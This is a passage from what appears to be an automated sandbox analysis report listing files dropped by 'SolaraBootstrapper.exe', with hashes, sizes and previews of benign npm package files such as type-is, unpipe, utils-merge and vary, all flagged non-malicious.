                                                  SHA-256:23D466B1B134B415B66FA50C6526B4CF3E7B9258554DA88D3ABB371721E7CE68
                                                  SHA-512:EBC137C01C13DA9D90FD411729B10CB15E6B7EA3F31A6B9DD23D0A769AEFE61CBEA7368C36698B0D562E85DCA08EBCAA59996F9653295A1C79252CBA3DA3D3AD
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014 Jonathan Ong <me@jongleberry.com>.Copyright (c) 2014-2015 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):5183
                                                  Entropy (8bit):4.947834154680962
                                                  Encrypted:false
                                                  SSDEEP:96:FCk15H39n7fKmAzLwWq2IX8AfKizfQIVGuMEeVjvWj:FCE3Vqq2IXPhVGpOj
                                                  MD5:2683527A9B2FAADD364A0EAB9CC00935
                                                  SHA1:B624A667819B1A0E66A842144092EDCB789C30D9
                                                  SHA-256:FFCB49607E72EBA2ED8B37C854762381E7D2DF2714CBDA5B921CED25841581AD
                                                  SHA-512:71EA5CEA73C5E541890BB31AE5A90A88CA19A7565B0A2957AFA0F875DFB596F9B745EE1D310D2149CEDDEBB7008EF8445FF6B71B4E3E0456FF8B7B1A59AF974A
                                                  Malicious:false
                                                  Preview:# type-is..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..Infer the content-type of a request...### Install..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install type-is.```..## API..```js.var http = require('http').var typeis = require('type-is')..http.createServer(function (req, res) {. var istext = typeis(req, ['text/*']). res.end('you ' + (istext ? 'sent' : 'did not send') + ' me text').}).```..### typeis(request, types)..Checks if the `request` is one of the `types`. If the request has no body,.even if there is a `Content-Type` header, then `null` is returned. If the.`Content
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5562
                                                  Entropy (8bit):4.8858002111817385
                                                  Encrypted:false
                                                  SSDEEP:96:pr6k1rbodiocKqn9rlsI87r34KKBEZdmx3Z4vF25XhPwc72OS0BkHfLZ:prn1rbeiSq9+QKap045XhB7/S0BkHfLZ
                                                  MD5:F9AA3AFDC332ADAE59AA21D31090582D
                                                  SHA1:7B36DDD28B09D31B459E9CBD15476DEC2FAC3FDB
                                                  SHA-256:4A94338BD746C6B17DD8681F21124F84ED2CDD4A16022849D28900D5E568642A
                                                  SHA-512:EB56ECD48A228933ED5BF0055791FEE237BDA3C609CDF84DF021D68EF5922401B18A1C5C9099B0A3A15091BEB61C5837A9A847355271CFCAEF4CDCE00F2BE474
                                                  Malicious:false
                                                  Preview:/*!. * type-is. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var typer = require('media-typer').var mime = require('mime-types')../**. * Module exports.. * @public. */..module.exports = typeofrequest.module.exports.is = typeis.module.exports.hasBody = hasbody.module.exports.normalize = normalize.module.exports.match = mimeMatch../**. * Compare a `value` content-type with `types`.. * Each `type` can be an extension like `html`,. * a special shortcut like `multipart` or `urlencoded`,. * or a mime type.. *. * If no types match, `false` is returned.. * Otherwise, the first `type` that matches is returned.. *. * @param {String} value. * @param {Array} types. * @public. */..function typeis (value, types_) {. var i. var types = types_.. // remove parameters and normalize. var val = tryNormalizeType(value).. // no type or invalid. if (!val) {. return false. }.. //
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1133
                                                  Entropy (8bit):4.78736433018023
                                                  Encrypted:false
                                                  SSDEEP:24:YZj1ZxVWbexf3YUgTYh3WZMCWxFXtoO70e:Y7PVWbe9YUg0hGqBxltoO7t
                                                  MD5:FFA244D8A6F745A081A0CDDE026879C9
                                                  SHA1:28D55C4730FDACF9019317FAE0BA93A0B6AEBD0B
                                                  SHA-256:87917E3DDA1080179447633C3EDFF7E4B917D62B463893C88CEF5BE0B2BABC63
                                                  SHA-512:C384F368197C1EB14252568398EFDD1FAFE497BA985538B3953294D5DD6B83B745B0648EDD60489D6AE3EA14607AAD3E6E0D38CB6ED4BE5684AAADE44C303D90
                                                  Malicious:false
                                                  Preview:{. "name": "type-is",. "description": "Infer the content-type of a request.",. "version": "1.6.18",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)". ],. "license": "MIT",. "repository": "jshttp/type-is",. "dependencies": {. "media-typer": "0.3.0",. "mime-types": "~2.1.24". },. "devDependencies": {. "eslint": "5.16.0",. "eslint-config-standard": "12.0.0",. "eslint-plugin-import": "2.17.2",. "eslint-plugin-markdown": "1.0.0",. "eslint-plugin-node": "8.0.1",. "eslint-plugin-promise": "4.1.1",. "eslint-plugin-standard": "4.0.0",. "mocha": "6.1.4",. "nyc": "14.0.0". },. "engines": {. "node": ">= 0.6". },. "files": [. "LICENSE",. "HISTORY.md",. "index.js". ],. "scripts": {. "lint": "eslint --plugin markdown --ext js,md .",. "test": "mocha --reporter spec --check-leaks --bail test/",. "test-cov": "nyc --reporter=html --reporter=te
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):59
                                                  Entropy (8bit):3.7457244047073406
                                                  Encrypted:false
                                                  SSDEEP:3:SVcG5IIAYSSFhF4:SCQIMSS2
                                                  MD5:3E523DF8AC60D8C162C57521955BDA8C
                                                  SHA1:7D305C01484F34F1B6CEC629368317A1C76AFD6F
                                                  SHA-256:6F6DC64D92C2450FD3A2FE41CA1DD3EBEB9C2321AC3C308728F5DE69FE6C6FEC
                                                  SHA-512:944576AD6105EB8E767D42B5C7AC9A3E66B9B739B7AB587C2BCED7D10C935198ACEB16EFA01B8297F7FE7E5B5983004D108F18195D2D578DB6D7653AA5D23BCE
                                                  Malicious:false
                                                  Preview:1.0.0 / 2015-06-14.==================.. * Initial release.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1114
                                                  Entropy (8bit):5.130133103702875
                                                  Encrypted:false
                                                  SSDEEP:24:9iJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:9iJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:934AB86A8AB081EA0326ADD08D550739
                                                  SHA1:140C0ED7F877E74246D459750884AADD7F3466A0
                                                  SHA-256:1A526FBE8D8577F5A4B1C2821842B55B7C0E18862531C62AE4CE69C9B19B74B6
                                                  SHA-512:E7D31B0D69A58710DBE84A59BFC15749609BCD4DF013FF700DE3CAEA0B0669562E905557F63B4BF745997DD8859457A03668F7F5F699EF9F0075555EE4F1864B
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2015 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1250
                                                  Entropy (8bit):4.9655786458541815
                                                  Encrypted:false
                                                  SSDEEP:24:ceqXSX2498ARP5A20KDR5ln/HvfBQQ5tgqTSGImemW6mK+NOdov:3qXC9XRBABKbZBMm7mKAB
                                                  MD5:B242AC151AC9750BF7CA20FE02DCF7B0
                                                  SHA1:BDA6E077E2453E52345108FA973B2E3D0074DA14
                                                  SHA-256:B091938BE61F002FC626C4DFABF66CF14FF0B5A8FA9758C9DBBDC37AB818CB5D
                                                  SHA-512:4883EE4A3A5776C9017960A1CBE980DF1481F7107D6E41F3673328DADFA82803B39597515E3F12D4382B68978D207CE284F87330C4F76405AA2F7A7354031FCB
                                                  Malicious:false
                                                  Preview:# unpipe..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-image]][node-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..Unpipe a stream from all destinations...## Installation..```sh.$ npm install unpipe.```..## API..```js.var unpipe = require('unpipe').```..### unpipe(stream)..Unpipes all destinations from a given stream. With stream 2+, this is.equivalent to `stream.unpipe()`. When used with streams 1 style streams.(typically Node.js 0.8 and below), this module attempts to undo the.actions done in `stream.pipe(dest)`...## License..[MIT](LICENSE)..[npm-image]: https://img.shields.io/npm/v/unpipe.svg.[npm-url]: https://npmjs.org/package/unpipe.[node-image]: https://img.shields.io/node/v/unpipe.svg.[node-url]: http://nodejs.org/download/.[travis-image]: https://img.shields.io/travis/stream-utils/unpipe.svg.[travis-url]: https://travis-ci.org/stream-utils/unpipe.[coveralls
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1118
                                                  Entropy (8bit):4.653728842990181
                                                  Encrypted:false
                                                  SSDEEP:24:++kpAtBhSrJbw4DbMq5OgPsDwGBgk4DEIcH9VBM:DkGbAwydOgPmwohyFcdE
                                                  MD5:377F0C4BDDBBD7E73B32A53E687DF342
                                                  SHA1:DF9106D2019FE2E4BFAE9882E4A8BE7012EB55CF
                                                  SHA-256:69CD57B5CDD08C42410EBC0D92235E334F1FB985E6EB2DCFB1C692DB674411BD
                                                  SHA-512:BFEC0A252C8D2718C6B747E40E6D3ACF165C5F797F725E4729E477707AAA04F6904E1B00688DD348CA25FE13ADEF8E3FC7F0FC8B03877359B5883224107DC0DE
                                                  Malicious:false
                                                  Preview:/*!. * unpipe. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = unpipe../**. * Determine if there are Node.js pipe-like data listeners.. * @private. */..function hasPipeDataListeners(stream) {. var listeners = stream.listeners('data').. for (var i = 0; i < listeners.length; i++) {. if (listeners[i].name === 'ondata') {. return true. }. }.. return false.}../**. * Unpipe a stream from all destinations.. *. * @param {object} stream. * @public. */..function unpipe(stream) {. if (!stream) {. throw new TypeError('argument stream is required'). }.. if (typeof stream.unpipe === 'function') {. // new-style. stream.unpipe(). return. }.. // Node.js 0.8 hack. if (!hasPipeDataListeners(stream)) {. return. }.. var listener. var listeners = stream.listeners('close').. for (var i = 0; i < listeners.length; i++) {. listener = listeners[i].. if (listener.name !== 'cleanu
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):770
                                                  Entropy (8bit):4.826779902861029
                                                  Encrypted:false
                                                  SSDEEP:12:bC+OQZ5u182QpBUtHhYW/kEVEnk6f3RGCjPcWjVSYLZLPOyZiPjXy8enYMw:bC+p5u1kuhYWVcFnlZqy4y8e1w
                                                  MD5:F8318A554ED98C6A030942E9C14AAAC8
                                                  SHA1:F67F2D17A18C3DED93C9423903DF8E6678F4E416
                                                  SHA-256:28B717F978D2A4FC72CD08236931443B63FE6586102DF3D1967E2B21EA8C5E11
                                                  SHA-512:673447C1A4022F7E46D3A1857B1DB481C3B61C4F936156E422E99B4EF2E35BCD8487A4B0F7533900A3B071FE7475E3D11732A3DF07F996383A04F508CE903AE8
                                                  Malicious:false
                                                  Preview:{. "name": "unpipe",. "description": "Unpipe a stream from all destinations",. "version": "1.0.0",. "author": "Douglas Christopher Wilson <doug@somethingdoug.com>",. "license": "MIT",. "repository": "stream-utils/unpipe",. "devDependencies": {. "istanbul": "0.3.15",. "mocha": "2.2.5",. "readable-stream": "1.1.13". },. "files": [. "HISTORY.md",. "LICENSE",. "README.md",. "index.js". ],. "engines": {. "node": ">= 0.8". },. "scripts": {. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-cov": "istanbul cover node_modules/mocha/bin/_mocha -- --reporter dot --check-leaks test/",. "test-travis": "istanbul cover node_modules/mocha/bin/_mocha --report lcovonly -- --reporter spec --check-leaks test/". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):79
                                                  Entropy (8bit):4.6812735898894395
                                                  Encrypted:false
                                                  SSDEEP:3:fxKiLUbNBK/fjBMRW0RUzo0v:fQiLM8/FoGoW
                                                  MD5:E22C42D21BDEA276864DA000C7D83756
                                                  SHA1:C675B26B3B3F739F86E570525FBAFA1AF6598031
                                                  SHA-256:3841A300F5CE46D39ABA5E9E221B3C90D518612606930E8103F3C9AE7E784C0D
                                                  SHA-512:B755B12018BBD2DA5C37F0EEA3D6D04028095A2E7D10810650B1E733649DFAE757A5234C8FB66A90AB016C2575AA32F24153768B843E8B74D8F8496B96D9DBD1
                                                  Malicious:false
                                                  Preview:CONTRIBUTING.md.Makefile.docs/.examples/.reports/.test/...jshintrc..travis.yml.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1084
                                                  Entropy (8bit):5.124276966611244
                                                  Encrypted:false
                                                  SSDEEP:24:bGPrOJH7H0yxgtAHw1hC09QHOsUv4tk4/+dpoaq/FD:bGPSJrlxEDdQHOs52TSaYFD
                                                  MD5:1CF0906082187F374CB9A63C54EB782C
                                                  SHA1:840EC17DC7B3131DEE404954B69C62B882BA6599
                                                  SHA-256:6E7D699CDD1E4FA837BA7718EA49841AA67201B449EA8B3F9CF274BE15974A64
                                                  SHA-512:58F059D1FF4A04B52284C8C58038CDAC8FC70B0E1AAA0103F8BE2BD928461F6C9E4BF0A8CA0897FD630A01CCEE13B8DE36CBC97EC14824A17569148CCC85986D
                                                  Malicious:false
                                                  Preview:The MIT License (MIT)..Copyright (c) 2013-2017 Jared Hanson..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1319
                                                  Entropy (8bit):5.219444793538169
                                                  Encrypted:false
                                                  SSDEEP:24:+B+J2IIEfLXMPXTTgoXgQ6mJEdpuTENzT6/E0dwCc9QGKznzkw6RfG9vGA:FJYEfLuTgzlmJEdsEtTAE0+7QGNTA
                                                  MD5:9E6A49A7623199D699F595777116296F
                                                  SHA1:3139B3182F49C480A6A6417D69A6657E37A56F2F
                                                  SHA-256:F6672DB98C83976565016569515C4FE33D8D9F0EA1F41044FCB1C91B1155FDA8
                                                  SHA-512:9D488012202F83A875ABFE7925F50788C4C304A83C5EA64665F7D38482AD7600F210E57F2E857693C86479A2B0F73BFE9D88B796A44E47DBF40E92AA99ED0FE3
                                                  Malicious:false
                                                  Preview:# utils-merge..[![Version](https://img.shields.io/npm/v/utils-merge.svg?label=version)](https://www.npmjs.com/package/utils-merge).[![Build](https://img.shields.io/travis/jaredhanson/utils-merge.svg)](https://travis-ci.org/jaredhanson/utils-merge).[![Quality](https://img.shields.io/codeclimate/github/jaredhanson/utils-merge.svg?label=quality)](https://codeclimate.com/github/jaredhanson/utils-merge).[![Coverage](https://img.shields.io/coveralls/jaredhanson/utils-merge.svg)](https://coveralls.io/r/jaredhanson/utils-merge).[![Dependencies](https://img.shields.io/david/jaredhanson/utils-merge.svg)](https://david-dm.org/jaredhanson/utils-merge)...Merges the properties from a source object into a destination object...## Install..```bash.$ npm install utils-merge.```..## Usage..```javascript.var a = { foo: 'bar' }. , b = { bar: 'baz' };..merge(a, b);.// => { foo: 'bar', bar: 'baz' }.```..## License..[The MIT License](http://opensource.org/licenses/MIT)..Copyright (c) 2013-2017 Jared Hanson <
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):381
                                                  Entropy (8bit):4.422770760937556
                                                  Encrypted:false
                                                  SSDEEP:6:UVcAoaKosuXtwYwlFamqn9YoJBwYvmJwJwNu8CirirBBuH/aEnOQ1t/Jevzv:UVcABKojurq9YoXwCYNuCrilBu3n7/Qr
                                                  MD5:20D03F8BF4486091C44F17A97CBB6C24
                                                  SHA1:77759A680BD22CACB94BDC438ED6250EEB10E50A
                                                  SHA-256:EC62860D6445ADDFFD574F640451EA92E0558B6DF793B2E0F1C7175FC2FF6366
                                                  SHA-512:E892863627CFC57839D23A8647010A6AB17C7683B827BF07CC6E130F7D937816075EBC83C013D5FBF6C98F65EAEF838093E8A2F891A8BD5E9D56937822F63EF5
                                                  Malicious:false
                                                  Preview:/**. * Merge object b with object a.. *. * var a = { foo: 'bar' }. * , b = { bar: 'baz' };. *. * merge(a, b);. * // => { foo: 'bar', bar: 'baz' }. *. * @param {Object} a. * @param {Object} b. * @return {Object}. * @api public. */..exports = module.exports = function(a, b){. if (a && b) {. for (var key in b) {. a[key] = b[key];. }. }. return a;.};.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):857
                                                  Entropy (8bit):4.6512860629235115
                                                  Encrypted:false
                                                  SSDEEP:12:qrgt18u3BozWSjJGbzAObmF2YHehETvn+204CQiYW9NJuPCWjV+dhcYbLu:Bt1l3+aSjobzCUhG04CQiYW96VaNS
                                                  MD5:0230ADE39B9C19F5FCC29ED02DFF4AFE
                                                  SHA1:A03473329C34092EA6A88CC11C409A4ECF8BAD33
                                                  SHA-256:6238E6D7E2FDDD3E4826014B4E69CB20D332B472999728A7157DB454C69121B8
                                                  SHA-512:260D0ED23C672B9ABED7557D6664484E79B2B2C204F6EE87E9E75242F921B0DC2F66113AB265F070B927802CD20B9D40E2174F0788DA56E26939FB10C8F885A6
                                                  Malicious:false
                                                  Preview:{. "name": "utils-merge",. "version": "1.0.1",. "description": "merge() utility function",. "keywords": [. "util". ],. "author": {. "name": "Jared Hanson",. "email": "jaredhanson@gmail.com",. "url": "http://www.jaredhanson.net/". },. "repository": {. "type": "git",. "url": "git://github.com/jaredhanson/utils-merge.git". },. "bugs": {. "url": "http://github.com/jaredhanson/utils-merge/issues". },. "license": "MIT",. "licenses": [. {. "type": "MIT",. "url": "http://opensource.org/licenses/MIT". }. ],. "main": "./index",. "dependencies": {},. "devDependencies": {. "make-node": "0.3.x",. "mocha": "1.x.x",. "chai": "1.x.x". },. "engines": {. "node": ">= 0.4.0". },. "scripts": {. "test": "node_modules/.bin/mocha --reporter spec --require test/bootstrap/node test/*.test.js". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):792
                                                  Entropy (8bit):4.662081372990917
                                                  Encrypted:false
                                                  SSDEEP:12:hhivfDcqWXpwnJqYrcviIucq1u6iyZrOTxCwQAS0fg0o/iVdQTrf8daVGhs0+J7Y:zis+0qcZStrh6/SL8XeY
                                                  MD5:01FB6033779E4F75D95E327672EBD572
                                                  SHA1:34B0D41868E3009838F528BA08F0B7D9C421A232
                                                  SHA-256:273B0EA4ABB4C7357DB4EED63E84F7A283847ED0165D041B25BE37071284D7E5
                                                  SHA-512:51C51B57E5DDD4C667EFFB71B354BB1C296654A80BB52798337F7797185FFC0DCCFB448B40B5ACCEAF38120290E1D0F5407305F81B5D49D32CDD6190A4B92B20
                                                  Malicious:false
                                                  Preview:1.1.2 / 2017-09-23.==================.. * perf: improve header token parsing speed..1.1.1 / 2017-03-20.==================.. * perf: hoist regular expression..1.1.0 / 2015-09-29.==================.. * Only accept valid field names in the `field` argument. - Ensures the resulting string is a valid HTTP header value..1.0.1 / 2015-07-08.==================.. * Fix setting empty header from empty `field`. * perf: enable strict mode. * perf: remove argument reassignments..1.0.0 / 2014-08-10.==================.. * Accept valid `Vary` header string as `field`. * Add `vary.append` for low-level string manipulation. * Move to `jshttp` orgainzation..0.1.0 / 2014-06-05.==================.. * Support array of fields to set..0.0.0 / 2014-06-04.==================.. * Initial release.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1094
                                                  Entropy (8bit):5.1284116326456815
                                                  Encrypted:false
                                                  SSDEEP:24:0iJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:0iJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:13BABC4F212CE635D68DA544339C962B
                                                  SHA1:4881AD2EC8EB2470A7049421047C6D076F48F1DE
                                                  SHA-256:BD47CE7B88C7759630D1E2B9FCFA170A0F1FDE522BE09E13FB1581A79D090400
                                                  SHA-512:40E30174433408E0E2ED46D24373B12DEF47F545D9183B7BCE28D4DDD8C8BB528075C7F20E118F37661DB9F1BBA358999D81A14425EB3E0A4A20865DFCB53182
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014-2017 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OTHERWISE, ARISING
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):2716
                                                  Entropy (8bit):5.01575990232993
                                                  Encrypted:false
                                                  SSDEEP:48:CqXC9RRkUwRNdXMoNjFNhk/JGWgXvKCharls1zfz/JA0gXvKCqyle3rXj58RN/e2:RXCI151CUlXvZAls1zDKbXvSyle3rX0V
                                                  MD5:D7ADD56E89E476E09F62AD4A926F1F7A
                                                  SHA1:85BA654D0C99438CA317F8581DE08D197954810E
                                                  SHA-256:03444F916DDB9A1C692C329F88B83B1A21D016DCE46656091F21E903109DD65C
                                                  SHA-512:A913511B9900C171C161CDF30F4948EFB758F6323B796317E32C8C555EA0F339F53B782BAA8CE649D20BFFBC5DB875D0C85FAA89CB6C12A94AB6E6C542448E64
                                                  Malicious:false
                                                  Preview:# vary..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..Manipulate the HTTP Vary header..## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally): ..```sh.$ npm install vary.```..## API.. eslint-disable no-unused-vars -->..```js.var vary = require('vary').```..### vary(res, field)..Adds the given header `field` to the `Vary` response header of `res`..This can be a string of a single field, a string of a valid `Vary`.header, or an array of multiple fields...This will append the header if not already listed, otherwise leaves.it listed in the current location... eslint-disable no-undef -->..``
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2930
                                                  Entropy (8bit):4.820541272922599
                                                  Encrypted:false
                                                  SSDEEP:48:kW373vBxqkg4LFfxFJbjNbqv3JnJyNH10XsF2HUJHV7oQtEW7lUxRYZ:N7fTqpyxxXbjNbKJnJyBOe2AZtBx+RYZ
                                                  MD5:8217C2D942EE5BF6866C92662515D975
                                                  SHA1:0E3F2E39B49663EB93E911C9F9C96D2C843D85DA
                                                  SHA-256:8E40311960636D40473C57E335BBCA115036766BF150DF296B941256432AB410
                                                  SHA-512:3EF722D37B016C63AC0126CFDCECB6D7140619D0CF4995898C0BBD9707951581527A6DCB78AC35E948C26FCA53B8A199CF5A28E8F41821F0D5B617DB54BABD41
                                                  Malicious:false
                                                  Preview:/*!. * vary. * Copyright(c) 2014-2017 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. */..module.exports = vary.module.exports.append = append../**. * RegExp to match field-name in RFC 7230 sec 3.2. *. * field-name = token. * token = 1*tchar. * tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*". * / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~". * / DIGIT / ALPHA. * ; any VCHAR, except delimiters. */..var FIELD_NAME_REGEXP = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/../**. * Append a field to a vary header.. *. * @param {String} header. * @param {String|Array} field. * @return {String}. * @public. */..function append (header, field) {. if (typeof header !== 'string') {. throw new TypeError('header argument is required'). }.. if (!field) {. throw new TypeError('field argument is required'). }.. // get fields array. var fields = !Array.isArray(field). ? parse(String(field)). : field..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1215
                                                  Entropy (8bit):4.850707992402894
                                                  Encrypted:false
                                                  SSDEEP:24:9X13Uwnr1y7efP6ifPVQeZWnWPf/Fn6T+l6oOUZqy4y8e1w:9X13UwBzfSifPVQeQWPf/B0+woOUogw
                                                  MD5:3577FC17C1B964AF7CFE2C17C73F84F3
                                                  SHA1:82F740E2254B786F7A3A39A762D4D0FC6EC7B008
                                                  SHA-256:73EDAEE964D527117A9F69D6360FBE6CEC534ABD9127794BE01A6AF58A139DAA
                                                  SHA-512:9FC7C9E6F129D53839998AC11523F7B4C47C541F7D4823B4C702358452A6CC903AFA546297151F947881C2D9D3703D0863A2387A5B25C276CE74BE91EBADC43B
                                                  Malicious:false
                                                  Preview:{. "name": "vary",. "description": "Manipulate the HTTP Vary header",. "version": "1.1.2",. "author": "Douglas Christopher Wilson <doug@somethingdoug.com>",. "license": "MIT",. "keywords": [. "http",. "res",. "vary". ],. "repository": "jshttp/vary",. "devDependencies": {. "beautify-benchmark": "0.2.4",. "benchmark": "2.1.4",. "eslint": "3.19.0",. "eslint-config-standard": "10.2.1",. "eslint-plugin-import": "2.7.0",. "eslint-plugin-markdown": "1.0.0-beta.6",. "eslint-plugin-node": "5.1.1",. "eslint-plugin-promise": "3.5.0",. "eslint-plugin-standard": "3.0.1",. "istanbul": "0.4.5",. "mocha": "2.5.3",. "supertest": "1.1.0". },. "files": [. "HISTORY.md",. "LICENSE",. "README.md",. "index.js". ],. "engines": {. "node": ">= 0.8". },. "scripts": {. "bench": "node benchmark/index.js",. "lint": "eslint --plugin markdown --ext js,md .",. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-cov":
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):25342
